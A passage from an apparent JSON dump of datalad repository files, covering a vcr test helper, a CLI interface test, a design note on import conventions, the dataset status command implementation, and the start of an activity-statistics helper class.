else:\n return _use_cassette(path, **kwargs) # just a straight one\n\n # shush vcr\n vcr_lgr = logging.getLogger('vcr')\n if lgr.getEffectiveLevel() > logging.DEBUG:\n vcr_lgr.setLevel(logging.WARN)\nexcept Exception as exc:\n if not isinstance(exc, ImportError):\n # something else went hairy (e.g. vcr failed to import boto due to some syntax error)\n lgr.warning(\"Failed to import vcr, no cassettes will be available: %s\",\n CapturedException(exc))\n # If there is no vcr.py -- provide a do nothing decorator for use_cassette\n\n def use_cassette(path, return_body=None, skip_if_no_vcr=False, **kwargs):\n if skip_if_no_vcr:\n def skip_decorator(t):\n @wraps(t)\n def wrapper(*args, **kwargs):\n from unittest import SkipTest\n raise SkipTest(\"No vcr\")\n return wrapper\n return skip_decorator\n else:\n def do_nothing_decorator(t):\n @wraps(t)\n def wrapper(*args, **kwargs):\n lgr.debug(\"Not using vcr cassette\")\n return t(*args, **kwargs)\n return wrapper\n return do_nothing_decorator\n\n\n@contextmanager\ndef externals_use_cassette(name):\n \"\"\"Helper to pass instruction via env variables to use specified cassette\n\n For instance whenever we are testing custom special remotes invoked by the annex\n but want to minimize their network traffic by using vcr.py\n \"\"\"\n from unittest.mock import patch\n cassette_path = str(Path(_get_cassette_path(name)).resolve()) # realpath OK\n with patch.dict('os.environ', {'DATALAD_TESTS_USECASSETTE': cassette_path}):\n yield\n" }, { "alpha_fraction": 0.6047579050064087, "alphanum_fraction": 0.605592668056488, "avg_line_length": 29.71794891357422, "blob_id": "bacc0b6a373a8ba3a1544d94294177f25a71a5e9", "content_id": "9a00cbcb268e43900d730df64590431b323d2a7f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2396, "license_type": "permissive", "max_line_length": 73, "num_lines": 78, "path": "/datalad/cli/tests/test_interface.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from datalad.interface.tests.test_docs import (\n demo_argdoc,\n demo_doc,\n demo_paramdoc,\n)\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_in,\n assert_not_in,\n eq_,\n)\n\nfrom ..interface import (\n alter_interface_docs_for_cmdline,\n get_cmdline_command_name,\n)\n\n\ndef test_alter_interface_docs_for_cmdline():\n alt = alter_interface_docs_for_cmdline(demo_doc)\n alt_l = alt.split('\\n')\n # de-dented\n assert_false(alt_l[0].startswith(' '))\n assert_false(alt_l[-1].startswith(' '))\n assert_not_in('PY', alt)\n assert_not_in('CMD', alt)\n assert_not_in('REFLOW', alt)\n assert_in('a b', alt)\n assert_in('not\\n reflowed', alt)\n assert_in(\"Something for the cmdline only Multiline!\", alt)\n assert_not_in(\"Some Python-only bits\", alt)\n assert_not_in(\"just for Python\", alt)\n assert_in(\"just for the command line\", alt)\n assert_in(\"multiline cli-only with [ brackets\\n[] ]\", alt)\n assert_not_in(\"multiline\\npython-only with [ brackets [] ]\", alt)\n\n # args\n altarg = alter_interface_docs_for_cmdline(demo_argdoc)\n # RST role markup\n eq_(alter_interface_docs_for_cmdline(':murks:`me and my buddies`'),\n 'me and my buddies')\n # spread across lines\n eq_(alter_interface_docs_for_cmdline(':term:`Barbara\\nStreisand`'),\n 'Barbara\\nStreisand')\n # multiple on one line\n eq_(alter_interface_docs_for_cmdline(\n ':term:`one` bla bla :term:`two` bla'),\n 'one bla bla two bla')\n\n altpd = alter_interface_docs_for_cmdline(demo_paramdoc)\n assert_not_in(\"PY\", altpd)\n assert_not_in(\"CMD\", altpd)\n assert_not_in('python', altpd)\n assert_not_in(\"python-only with [ some brackets []\", altpd)\n assert_in('in between', altpd)\n assert_in('appended', altpd)\n assert_in('cmdline', altpd)\n assert_in(\"multiline cli-only [\\n brackets included \"\n \"[ can we also have || ?]\", altpd)\n\n\ndef test_name_generation():\n eq_(\n get_cmdline_command_name((\"some.module_something\", \"SomeClass\")),\n \"module-something\")\n eq_(\n get_cmdline_command_name((\n \"some.module_something\",\n \"SomeClass\",\n \"override\")),\n \"override\")\n eq_(\n get_cmdline_command_name((\n \"some.module_something\",\n \"SomeClass\",\n \"override\",\n \"api_ignore\")),\n \"override\")\n" }, { "alpha_fraction": 0.68319171667099, "alphanum_fraction": 0.6888574361801147, "avg_line_length": 26.802631378173828, "blob_id": "efd50c015ca4430e215cc1d3c0e4806f3a096798", "content_id": "02177401d39073d68492a3d0b07ebe9059cc14fd", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2118, "license_type": "permissive", "max_line_length": 195, "num_lines": 76, "path": "/docs/source/design/python_imports.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_python_imports:\n\n************************\nPython import statements\n************************\n\n.. topic:: Specification scope and status\n\n This specification describes the current (albeit incomplete) implementation.\n\nThe following rules apply to any ``import`` statement in the code base:\n\n- All imports *must* be absolute, unless they import individual pieces of an integrated code component that is only split across several source code files for technical or organizational reasons.\n\n- Imports *must* be placed at the top of a source file, unless there is a\n specific reason not to do so (e.g., delayed import due to performance\n concerns, circular dependencies). If such a reason exists, it *must*\n be documented by a comment at the import statement.\n\n- There *must* be no more than one import per line.\n\n- Multiple individual imports from a single module *must* follow the pattern::\n\n from <module> import (\n symbol1,\n symbol2,\n )\n\n Individual imported symbols *should* be sorted alphabetically. The last symbol\n line *should* end with a comma.\n\n- Imports from packages and modules *should* be grouped in categories like\n\n - Standard library packages\n\n - 3rd-party packages\n\n - DataLad core (absolute imports)\n\n - DataLad extensions\n \n - DataLad core (\"local\" relative imports)\n \n Sorting imports can be aided by https://github.com/PyCQA/isort (e.g. ``python -m isort -m3 --fgw 2 --tc <filename>``).\n\n\n\nExamples\n========\n\n::\n\n from collections import OrderedDict\n import logging\n import os\n\n from datalad.utils import (\n bytes2human,\n ensure_list,\n ensure_unicode,\n get_dataset_root as gdr,\n )\n \n In the `datalad/submodule/tests/test_mod.py` test file demonstrating an \"exception\" to absolute imports\n rule where test files are accompanying corresponding files of the underlying module:: \n \n import os\n \n from datalad.utils import ensure_list\n \n from ..mod import func1\n\n from datalad.tests.utils_pytest import assert_true\n \n" }, { "alpha_fraction": 0.6016497611999512, "alphanum_fraction": 0.6028744578361511, "avg_line_length": 41.255706787109375, "blob_id": "b36712e548fee91528c78284bd1a0fda2dec3bb0", "content_id": "c591880aaa8311d088b059265ea5fdfa464e5588", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27762, "license_type": "permissive", "max_line_length": 94, "num_lines": 657, "path": "/datalad/core/local/status.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Report status of a dataset (hierarchy)'s work tree\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport os\nimport os.path as op\nfrom collections import OrderedDict\nimport warnings\n\nfrom datalad.utils import (\n bytes2human,\n ensure_list,\n ensure_unicode,\n get_dataset_root,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n recursion_limit,\n recursion_flag,\n)\nfrom datalad.interface.utils import generic_result_renderer\nimport datalad.support.ansi_colors as ac\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n path_under_rev_dataset,\n)\n\nimport datalad.utils as ut\n\nfrom datalad.dochelpers import single_or_plural\n\nlgr = logging.getLogger('datalad.core.local.status')\n\n_common_diffstatus_params = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to query. If\n no dataset is given, an attempt is made to identify the dataset\n based on the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n annex=Parameter(\n args=('--annex',),\n # the next two enable a sole `--annex` that auto-translates to\n # `--annex basic`\n const='basic',\n nargs='?',\n constraints=EnsureChoice(None, 'basic', 'availability', 'all'),\n doc=\"\"\"Switch whether to include information on the annex\n content of individual files in the status report, such as\n recorded file size. By default no annex information is reported\n (faster). Three report modes are available: basic information\n like file size and key name ('basic'); additionally test whether\n file content is present in the local annex ('availability';\n requires one or two additional file system stat calls, but does\n not call git-annex), this will add the result properties\n 'has_content' (boolean flag) and 'objloc' (absolute path to an\n existing annex object file); or 'all' which will report all\n available information (presently identical to 'availability').\n [CMD: The 'basic' mode will be assumed when this option is given,\n but no mode is specified. CMD]\n \"\"\"),\n untracked=Parameter(\n args=('--untracked',),\n constraints=EnsureChoice('no', 'normal', 'all'),\n doc=\"\"\"If and how untracked content is reported when comparing\n a revision to the state of the working tree. 'no': no untracked\n content is reported; 'normal': untracked files and entire\n untracked directories are reported as such; 'all': report\n individual files even in fully untracked directories.\"\"\"),\n recursive=recursion_flag,\n recursion_limit=recursion_limit)\n\n\nSTATE_COLOR_MAP = {\n 'untracked': ac.RED,\n 'modified': ac.RED,\n 'deleted': ac.RED,\n 'added': ac.GREEN,\n 'unknown': ac.YELLOW,\n}\n\n\ndef yield_dataset_status(ds, paths, annexinfo, untracked, recursion_limit,\n queried, eval_submodule_state, eval_filetype, cache,\n reporting_order):\n \"\"\"Internal helper to obtain status information on a dataset\n\n Parameters\n ----------\n ds : Dataset\n Dataset to get the status of.\n path : Path-like, optional\n Paths to constrain the status to (see main status() command).\n annexinfo : str\n Annex information reporting mode (see main status() command).\n untracked : str, optional\n Reporting mode for untracked content (see main status() command).\n recursion_limit : int, optional\n queried : set\n Will be populated with a Path instance for each queried dataset.\n eval_submodule_state : str\n Submodule evaluation mode setting for Repo.diffstatus().\n eval_filetype : bool, optional\n THIS OPTION IS IGNORED. It will be removed in a future release.\n cache : dict\n Cache to be passed on to all Repo.diffstatus() calls to avoid duplicate\n queries.\n reporting_order : {'depth-first', 'breadth-first'}, optional\n By default, subdataset content records are reported after the record\n on the subdataset's submodule in a superdataset (depth-first).\n Alternatively, report all superdataset records first, before reporting\n any subdataset content records (breadth-first).\n\n Yields\n ------\n dict\n DataLad result records.\n \"\"\"\n if eval_filetype is not None:\n warnings.warn(\n \"yield_dataset_status(eval_filetype=) no longer supported, \"\n \"and will be removed in a future release\",\n DeprecationWarning)\n\n if reporting_order not in ('depth-first', 'breadth-first'):\n raise ValueError('Unknown reporting order: {}'.format(reporting_order))\n\n if ds.pathobj in queried:\n # do not report on a single dataset twice\n return\n # take the dataset that went in first\n repo = ds.repo\n repo_path = repo.pathobj\n lgr.debug('Querying %s.diffstatus() for paths: %s', repo, paths)\n # recode paths with repo reference for low-level API\n paths = [repo_path / p.relative_to(ds.pathobj) for p in paths] if paths else None\n status = repo.diffstatus(\n fr='HEAD' if repo.get_hexsha() else None,\n to=None,\n paths=paths,\n untracked=untracked,\n eval_submodule_state=eval_submodule_state,\n _cache=cache)\n if annexinfo and hasattr(repo, 'get_content_annexinfo'):\n if paths:\n # when an annex query has been requested for specific paths,\n # exclude untracked files from the annex query (else gh-7032)\n untracked = [k for k, v in status.items() if\n v['state'] == 'untracked']\n lgr.debug(\n 'Skipping %s.get_content_annexinfo() for untracked paths: %s',\n repo, paths)\n [paths.remove(p) for p in untracked]\n lgr.debug('Querying %s.get_content_annexinfo() for paths: %s', repo, paths)\n # this will amend `status`\n repo.get_content_annexinfo(\n paths=paths,\n init=status,\n eval_availability=annexinfo in ('availability', 'all'),\n ref=None)\n # potentially collect subdataset status call specs for the end\n # (if order == 'breadth-first')\n subds_statuscalls = []\n for path, props in status.items():\n cpath = ds.pathobj / path.relative_to(repo_path)\n yield dict(\n props,\n path=str(cpath),\n # report the dataset path rather than the repo path to avoid\n # realpath/symlink issues\n parentds=ds.path,\n )\n queried.add(ds.pathobj)\n if recursion_limit and props.get('type', None) == 'dataset':\n if cpath == ds.pathobj:\n # ATM can happen if there is something wrong with this repository\n # We will just skip it here and rely on some other exception to bubble up\n # See https://github.com/datalad/datalad/pull/4526 for the usecase\n lgr.debug(\"Got status for itself, which should not happen, skipping %s\", path)\n continue\n subds = Dataset(str(cpath))\n if subds.is_installed():\n call_args = (\n subds,\n None,\n annexinfo,\n untracked,\n recursion_limit - 1,\n queried,\n eval_submodule_state,\n None,\n cache,\n )\n call_kwargs = dict(\n reporting_order='depth-first',\n )\n if reporting_order == 'depth-first':\n yield from yield_dataset_status(*call_args, **call_kwargs)\n else:\n subds_statuscalls.append((call_args, call_kwargs))\n\n # deal with staged subdataset status calls\n for call_args, call_kwargs in subds_statuscalls:\n yield from yield_dataset_status(*call_args, **call_kwargs)\n\n\n@build_doc\nclass Status(Interface):\n \"\"\"Report on the state of dataset content.\n\n This is an analog to `git status` that is simultaneously crippled and more\n powerful. It is crippled, because it only supports a fraction of the\n functionality of its counter part and only distinguishes a subset of the\n states that Git knows about. But it is also more powerful as it can handle\n status reports for a whole hierarchy of datasets, with the ability to\n report on a subset of the content (selection of paths) across any number\n of datasets in the hierarchy.\n\n *Path conventions*\n\n All reports are guaranteed to use absolute paths that are underneath the\n given or detected reference dataset, regardless of whether query paths are\n given as absolute or relative paths (with respect to the working directory,\n or to the reference dataset, when such a dataset is given explicitly).\n Moreover, so-called \"explicit relative paths\" (i.e. paths that start with\n '.' or '..') are also supported, and are interpreted as relative paths with\n respect to the current working directory regardless of whether a reference\n dataset with specified.\n\n When it is necessary to address a subdataset record in a superdataset\n without causing a status query for the state _within_ the subdataset\n itself, this can be achieved by explicitly providing a reference dataset\n and the path to the root of the subdataset like so::\n\n datalad status --dataset . subdspath\n\n In contrast, when the state of the subdataset within the superdataset is\n not relevant, a status query for the content of the subdataset can be\n obtained by adding a trailing path separator to the query path (rsync-like\n syntax)::\n\n datalad status --dataset . subdspath/\n\n When both aspects are relevant (the state of the subdataset content\n and the state of the subdataset within the superdataset), both queries\n can be combined::\n\n datalad status --dataset . subdspath subdspath/\n\n When performing a recursive status query, both status aspects of subdataset\n are always included in the report.\n\n\n *Content types*\n\n The following content types are distinguished:\n\n - 'dataset' -- any top-level dataset, or any subdataset that is properly\n registered in superdataset\n - 'directory' -- any directory that does not qualify for type 'dataset'\n - 'file' -- any file, or any symlink that is placeholder to an annexed\n file when annex-status reporting is enabled\n - 'symlink' -- any symlink that is not used as a placeholder for an annexed\n file\n\n *Content states*\n\n The following content states are distinguished:\n\n - 'clean'\n - 'added'\n - 'modified'\n - 'deleted'\n - 'untracked'\n \"\"\"\n # make the custom renderer the default one, as the global default renderer\n # does not yield meaningful output for this command\n result_renderer = 'tailored'\n _examples_ = [\n dict(text=\"Report on the state of a dataset\",\n code_py=\"status()\",\n code_cmd=\"datalad status\"),\n dict(text=\"Report on the state of a dataset and all subdatasets\",\n code_py=\"status(recursive=True)\",\n code_cmd=\"datalad status -r\"),\n dict(text=\"Address a subdataset record in a superdataset without \"\n \"causing a status query for the state _within_ the subdataset \"\n \"itself\",\n code_py=\"status(dataset='.', path='mysubdataset')\",\n code_cmd=\"datalad status -d . mysubdataset\"),\n dict(text=\"Get a status query for the state within the subdataset \"\n \"without causing a status query for the superdataset (using trailing \"\n \"path separator in the query path):\",\n code_py=\"status(dataset='.', path='mysubdataset/')\",\n code_cmd=\"datalad status -d . mysubdataset/\"),\n dict(text=\"Report on the state of a subdataset in a superdataset and \"\n \"on the state within the subdataset\",\n code_py=\"status(dataset='.', path=['mysubdataset', 'mysubdataset/'])\",\n code_cmd=\"datalad status -d . mysubdataset mysubdataset/\"),\n dict(text=\"Report the file size of annexed content in a dataset\",\n code_py=\"status(annex=True)\",\n code_cmd=\"datalad status --annex\")\n ]\n\n _params_ = dict(\n _common_diffstatus_params,\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"\"\"path to be evaluated\"\"\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n eval_subdataset_state=Parameter(\n args=(\"-e\", \"--eval-subdataset-state\",),\n constraints=EnsureChoice('no', 'commit', 'full'),\n doc=\"\"\"Evaluation of subdataset state (clean vs.\n modified) can be expensive for deep dataset hierarchies\n as subdataset have to be tested recursively for\n uncommitted modifications. Setting this option to\n 'no' or 'commit' can substantially boost performance\n by limiting what is being tested. With 'no' no state\n is evaluated and subdataset result records typically do\n not contain a 'state' property.\n With 'commit' only a discrepancy of the HEAD commit\n shasum of a subdataset and the shasum recorded in the\n superdataset's record is evaluated,\n and the 'state' result property only reflects this\n aspect. With 'full' any other modification is considered\n too (see the 'untracked' option for further tailoring\n modification testing).\"\"\"),\n report_filetype=Parameter(\n args=(\"-t\", \"--report-filetype\",),\n constraints=EnsureChoice('raw', 'eval', None),\n doc=\"\"\"THIS OPTION IS IGNORED. It will be removed in a future\n release. Dataset component types are always reported\n as-is (previous 'raw' mode), unless annex-reporting is enabled\n with the [CMD: --annex CMD][PY: `annex` PY] option, in which\n case symlinks that represent annexed files will be reported\n as type='file'.\"\"\"),\n )\n\n @staticmethod\n @datasetmethod(name='status')\n @eval_results\n def __call__(\n path=None,\n *,\n dataset=None,\n annex=None,\n untracked='normal',\n recursive=False,\n recursion_limit=None,\n eval_subdataset_state='full',\n report_filetype=None):\n if report_filetype is not None:\n warnings.warn(\n \"status(report_filetype=) no longer supported, and will be removed \"\n \"in a future release\",\n DeprecationWarning)\n\n # To the next white knight that comes in to re-implement `status` as a\n # special case of `diff`. There is one fundamental difference between\n # the two commands: `status` can always use the worktree as evident on\n # disk as a constraint (e.g. to figure out which subdataset a path is\n # in) `diff` cannot do that (everything need to be handled based on a\n # \"virtual\" representation of a dataset hierarchy).\n # MIH concludes that while `status` can be implemented as a special case\n # of `diff` doing so would complicate and slow down both `diff` and\n # `status`. So while the apparent almost code-duplication between the\n # two commands feels wrong, the benefit is speed. Any future RF should\n # come with evidence that speed does not suffer, and complexity stays\n # on a manageable level\n ds = require_dataset(\n dataset, check_installed=True, purpose='report status')\n ds_path = ds.path\n queried = set()\n content_info_cache = {}\n for res in _yield_paths_by_ds(ds, dataset, ensure_list(path)):\n if 'status' in res:\n # this is an error\n yield res\n continue\n for r in yield_dataset_status(\n res['ds'],\n res['paths'],\n annex,\n untracked,\n recursion_limit\n if recursion_limit is not None else -1\n if recursive else 0,\n queried,\n eval_subdataset_state,\n None,\n content_info_cache,\n reporting_order='depth-first'):\n if 'status' not in r:\n r['status'] = 'ok'\n yield dict(\n r,\n refds=ds_path,\n action='status',\n )\n\n @staticmethod\n def custom_result_renderer(res, **kwargs): # pragma: more cover\n if (res['status'] == 'ok' and res['action'] in ('status', 'diff')\n and res.get('state') == 'clean'):\n # this renderer will be silent for clean status|diff results\n return\n if res['status'] != 'ok' or res['action'] not in ('status', 'diff'):\n # whatever this renderer cannot account for, send to generic\n generic_result_renderer(res)\n return\n from datalad.ui import ui\n # when to render relative paths:\n # 1) if a dataset arg was given\n # 2) if CWD is the refds\n refds = res.get('refds', None)\n refds = refds if kwargs.get('dataset', None) is not None \\\n or refds == os.getcwd() else None\n path = res['path'] if refds is None \\\n else str(ut.Path(res['path']).relative_to(refds))\n type_ = res.get('type', res.get('type_src', ''))\n max_len = len('untracked')\n state = res.get('state', 'unknown')\n ui.message(u'{fill}{state}: {path}{type_}'.format(\n fill=' ' * max(0, max_len - len(state)),\n state=ac.color_word(\n state,\n STATE_COLOR_MAP.get(res.get('state', 'unknown'))),\n path=path,\n type_=' ({})'.format(\n ac.color_word(type_, ac.MAGENTA) if type_ else '')))\n\n @staticmethod\n def custom_result_summary_renderer(results): # pragma: more cover\n # fish out sizes of annexed files. those will only be present\n # with --annex ...\n annexed = [\n (r.get('bytesize', None), r.get('has_content', None), r['path'])\n for r in results\n if r.get('action', None) == 'status' \\\n and 'key' in r]\n if annexed:\n # convert to int and interrogate files with content but\n # with unknown size (e.g. for --relaxed URLs), and drop 'path'\n annexed = [\n (int(bytesize) if bytesize is not None else (\n int(os.stat(path).st_size) if has_content else 0\n ), has_content)\n for bytesize, has_content, path in annexed\n ]\n have_availability = any(a[1] is not None for a in annexed)\n total_size = bytes2human(sum(a[0] for a in annexed))\n # we have availability info encoded in the results\n from datalad.ui import ui\n if have_availability:\n ui.message(\n \"{} annex'd {} ({}/{} present/total size)\".format(\n len(annexed),\n single_or_plural('file', 'files', len(annexed)),\n bytes2human(sum(a[0] for a in annexed if a[1])),\n total_size))\n else:\n ui.message(\n \"{} annex'd {} ({} recorded total size)\".format(\n len(annexed),\n single_or_plural('file', 'files', len(annexed)),\n total_size))\n if all(r.get('action', None) == 'status'\n and r.get('state', None) == 'clean'\n for r in results):\n from datalad.ui import ui\n ui.message(\"nothing to save, working tree clean\")\n\n\ndef get_paths_by_ds(refds, dataset_arg, paths, subdsroot_mode='rsync'):\n \"\"\"Resolve and sort any paths into their containing datasets\n\n Any path will be associated (sorted into) its nearest containing dataset.\n It is irrelevant whether or not a path presently exists on the file system.\n However, only datasets that exist on the file system are used for\n sorting/association -- known, but non-existent subdatasets are not\n considered.\n\n Parameters\n ----------\n refds: Dataset\n dataset_arg: Dataset or str or Path or None\n Any supported value given to a command's `dataset` argument. Given\n to `resolve_path()`.\n paths: list\n Any number of absolute or relative paths, in str-form or as\n Path instances, to be sorted into their respective datasets. See also\n the `subdsroot_mode` parameter.\n subdsroot_mode: {'rsync', 'super', 'sub'}\n Switch behavior for paths that are the root of a subdataset. By default\n ('rsync'), such a path is associated with its parent/superdataset,\n unless the path ends with a trailing directory separator, in which case\n it is sorted into the subdataset record (this resembles the path\n semantics of rsync, hence the label). In 'super' mode, the path is always\n placed with the superdataset record. Likewise, in 'sub' mode the path\n is always placed into the subdataset record.\n\n Returns\n -------\n dict, list\n The first return value is the main result, a dictionary with root\n directories of all discovered datasets as keys and a list of the\n associated paths inside these datasets as values. Keys and values are\n normalized to be Path instances of absolute paths.\n The second return value is a list of all paths (again Path instances)\n that are not located underneath the reference dataset.\n \"\"\"\n ds_path = refds.path\n paths_by_ds = dict()\n errors = []\n\n if not paths:\n # that was quick\n paths_by_ds[refds.pathobj] = None\n return paths_by_ds, errors\n\n # in order to guarantee proper path sorting, we first need to resolve all\n # of them (some may be str, some Path, some relative, some absolute)\n # step 1: normalize to unicode\n paths = map(ensure_unicode, paths)\n # step 2: resolve\n # for later comparison, we need to preserve the original value too\n paths = [(resolve_path(p, dataset_arg), str(p)) for p in paths]\n # OPT: store cache for dataset roots for each directory directly\n # listed in paths, or containing the path (if file)\n roots_cache = {}\n # sort any path argument into the respective subdatasets\n # sort by comparing the resolved Path instances, this puts top-level\n # paths first, leading to their datasets to be injected into the result\n # dict first\n for p, orig_path in sorted(paths, key=lambda x: x[0]):\n # TODO (left from implementing caching OPT):\n # Logic here sounds duplicated with discover_dataset_trace_to_targets\n # and even get_tree_roots of save.\n str_p = str(p)\n\n # query get_dataset_root caching for repeated queries within the same\n # directory\n if p.is_dir():\n p_dir = str(p)\n else: # symlink, file, whatnot - seems to match logic in get_dataset_root\n p_dir = str(p.parent)\n\n try:\n root = roots_cache[p_dir]\n except KeyError:\n root = roots_cache[p_dir] = get_dataset_root(p_dir)\n\n # to become the root of the dataset that contains the path in question\n # in the context of (same basepath) as the reference dataset\n qds_inrefds = None\n if root is not None:\n qds_inrefds = path_under_rev_dataset(refds, root)\n if root is None or qds_inrefds is None:\n # no root, not possibly underneath the refds\n # or root that is not underneath/equal the reference dataset root\n errors.append(p)\n continue\n\n if root != qds_inrefds:\n # try to recode the dataset path wrt to the reference\n # dataset\n # the path that it might have been located by could\n # have been a resolved path or another funky thing\n # the path this dataset was located by is not how it would\n # be referenced underneath the refds (possibly resolved\n # realpath) -> recode all paths to be underneath the refds\n p = qds_inrefds / p.relative_to(root)\n root = qds_inrefds\n\n # Note: Compare to Dataset(root).path rather\n # than root to get same path normalization.\n if root == str_p and not Dataset(root).path == ds_path and (\n subdsroot_mode == 'super' or (\n subdsroot_mode == 'rsync' and dataset_arg and\n not orig_path.endswith(op.sep))):\n # the given path is pointing to a subdataset\n # and we are either in 'super' mode, or in 'rsync' and found\n # rsync-link syntax to identify the dataset as whole\n # (e.g. 'ds') vs its content (e.g. 'ds/')\n root_dir = op.dirname(root)\n try:\n super_root = roots_cache[root_dir]\n except KeyError:\n super_root = roots_cache[root_dir] = get_dataset_root(root_dir)\n if super_root:\n # the dataset identified by the path argument\n # is contained in a superdataset, and no\n # trailing path separator was found in the\n # argument -> user wants to address the dataset\n # as a whole (in the superdataset)\n root = super_root\n\n root = ut.Path(root)\n ps = paths_by_ds.get(root, [])\n ps.append(p)\n paths_by_ds[root] = ps\n return paths_by_ds, errors\n\n\ndef _yield_paths_by_ds(refds, dataset_arg, paths):\n \"\"\"Status-internal helper to yield get_paths_by_ds() items\"\"\"\n paths_by_ds, errors = get_paths_by_ds(refds, dataset_arg, paths)\n # communicate all the problems\n for e in errors:\n yield dict(\n path=str(e),\n action='status',\n refds=refds.path,\n status='error',\n message=('path not underneath the reference dataset %s',\n refds.path),\n logger=lgr)\n\n while paths_by_ds:\n # gh-6566 advised replacement of OrderedDicts with dicts for performance\n # The previous qdspath, qpaths = paths_by_ds.popitem(last=False) used an\n # OrderedDict specific function (returns k, v in FIFO order). Below is a\n # less pretty replacement for this functionality with a pure dict\n qdspath = next(iter(paths_by_ds.keys()))\n qpaths = paths_by_ds.pop(qdspath)\n if qpaths and qdspath in qpaths:\n # this is supposed to be a full status query, save some\n # cycles sifting through the actual path arguments\n qpaths = []\n yield dict(ds=Dataset(qdspath), paths=qpaths)\n" }, { "alpha_fraction": 0.5117970108985901, "alphanum_fraction": 0.5134130716323853, "avg_line_length": 31.22916603088379, "blob_id": "c950e4e4b2c0ec5163b163cb323e7c26a29f03ec", "content_id": "3b572876523a1166adcaf7592aaa9e3fc5155caa", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6188, "license_type": "permissive", "max_line_length": 99, "num_lines": 192, "path": "/datalad/support/stats.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"A helper for collecting stats on carried out actions\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n# TODO: we have already smth in progressbar... check\nimport humanize\n\n_COUNTS = (\n 'files', 'urls',\n 'add_git', 'add_annex', 'dropped',\n 'skipped', 'overwritten', 'renamed', 'removed',\n 'downloaded', 'downloaded_size', 'downloaded_time',\n 'datasets_crawled',\n 'datasets_crawl_failed',\n)\n\n_LISTS = (\n 'merges', # merges which were carried out (from -> to)\n 'versions', # versions encountered. Latest would be used for tagging\n)\n\n_FORMATTERS = {\n # TODO:\n 'downloaded_size': humanize.naturalsize,\n 'merges': lambda merges: \", \".join('->'.join(merge) for merge in merges),\n 'versions': lambda versions: ', '.join(versions)\n}\n\n\n# @auto_repr\nclass ActivityStats(object):\n \"\"\"Helper to collect/pass statistics on carried out actions\n\n It also keeps track of total counts, which do not get reset by\n reset() call, and \"total\" stat could be obtained by .get_total()\n Could be done so many other ways\n \"\"\"\n __metrics__ = _COUNTS + _LISTS\n __slots__ = __metrics__ + ('_current', '_total')\n\n def __init__(self, **vals):\n self._current = {}\n self._total = {}\n self.reset(full=True, vals=vals)\n\n def __repr__(self):\n # since auto_repr doesn't support \"non-0\" values atm\n return \"%s(%s)\" \\\n % (self.__class__.__name__,\n \", \".join([\"%s=%s\" % (k, v) for k, v in self._current.items() if v]))\n\n # Comparisons operate solely on _current\n def __eq__(self, other):\n return (self._current == other._current) # and (self._total == other._total)\n\n def __ne__(self, other):\n return (self._current != other._current) # or (self._total != other._total)\n\n def __iadd__(self, other):\n for m in other.__metrics__:\n # not inplace for increased paranoia for bloody lists, and dummy implementation of *add\n self._current[m] = self._current[m] + other._current[m]\n self._total[m] = self._total[m] + other._total[m]\n return self\n\n def __add__(self, other):\n # crashed\n # out = deepcopy(self)\n # so doing ugly way\n out = ActivityStats(**self._current)\n out._total = self._total.copy()\n out += other\n return out\n\n def __setattr__(self, key, value):\n if key in self.__metrics__:\n self._current[key] = value\n else:\n return super(ActivityStats, self).__setattr__(key, value)\n\n def __getattribute__(self, key):\n if (not key.startswith('_')) and key in self.__metrics__:\n return self._current[key]\n else:\n return super(ActivityStats, self).__getattribute__(key)\n\n def _get_updated_total(self):\n \"\"\"Return _total updated with _current\n \"\"\"\n out = self._total.copy()\n for k, v in self._current.items():\n # not inplace + so we could create copies of lists\n out[k] = out[k] + v\n return out\n\n def increment(self, k, v=1):\n \"\"\"Helper for incrementing counters\"\"\"\n self._current[k] += v\n\n def _reset_values(self, d, vals):\n for c in _COUNTS:\n d[c] = vals.get(c, 0)\n for l in _LISTS:\n d[l] = vals.get(l, [])\n\n def reset(self, full=False, vals=None):\n # Initialize\n if vals is None:\n vals = {}\n if not full:\n self._total = self._get_updated_total()\n self._reset_values(self._current, vals=vals)\n if full:\n self._reset_values(self._total, vals=vals)\n\n def get_total(self):\n \"\"\"Return a copy of total stats (for 